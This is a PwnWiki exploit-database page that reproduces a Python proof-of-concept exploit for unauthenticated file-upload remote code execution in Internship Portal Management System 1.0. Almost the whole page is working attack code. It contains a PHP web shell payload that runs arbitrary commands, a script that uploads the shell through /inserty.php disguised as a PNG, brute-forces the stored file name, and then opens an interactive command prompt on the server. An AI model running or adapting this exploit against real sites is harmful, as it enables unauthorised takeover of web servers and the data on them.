Loading
0

Internship Portal Management System 1.0 未经身份验证文件上传&任意代码执行漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

EXP

# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
# Date: 2021-05-04
# Exploit Author: argenestel
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: Debian 10

import requests
import time

#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
proxies = {
 "http": "http://127.0.0.1:8080",
}
#payload
payload='<?php if(isset($_REQUEST\'cmd\')){ echo "<pre>"; $cmd = ($_REQUEST\'cmd\'); system($cmd); echo "

"; die; }?>'

  1. the upload point

insert_url=url+"/inserty.php"

def fill_details():

   global payload
   global shellend
   global shellstart
   print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
   #time start
   shellstart=int(time.time())
   #print(shellstart)
   files  = {'file':('shell.php',payload,
                   'image/png', {'Content-Disposition': 'form-data'}
                 )
             }
   data = {
           "company_name":"some",
           "first_name":"some",
           "last_name":"some",
           "email":"email protected",
           "gender":"Male",
           "insert_button":"Apply",
           "terms":"on"
   }
   r = requests.post(insert_url, data=data, files=files)
   if r.status_code == 200:
       print("Exploited Intern System Successfully...")
       shellend = int(time.time())
       #print(shellend)
       shell()
   else:
       print("Exploit Failed")

def shell():

   for shellname in range(shellstart, shellend+1):
       shellstr=str(shellname)
       shell_url=url+"/upload/"+shellstr+"_shell.php"
       r = requests.get(shell_url)
       if r.status_code == 200:
           shell_url=url+"/upload/"+shellstr+"_shell.php"
           break
   
   r = requests.get(shell_url)
   if r.status_code == 200:
       print("Shell Starting...")
       while True:
           cmd=input("cmd$ ")
           r = requests.get(shell_url+"?cmd="+cmd)
           print(r.text)
   else:
       print("File Name Error")

fill_details()

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库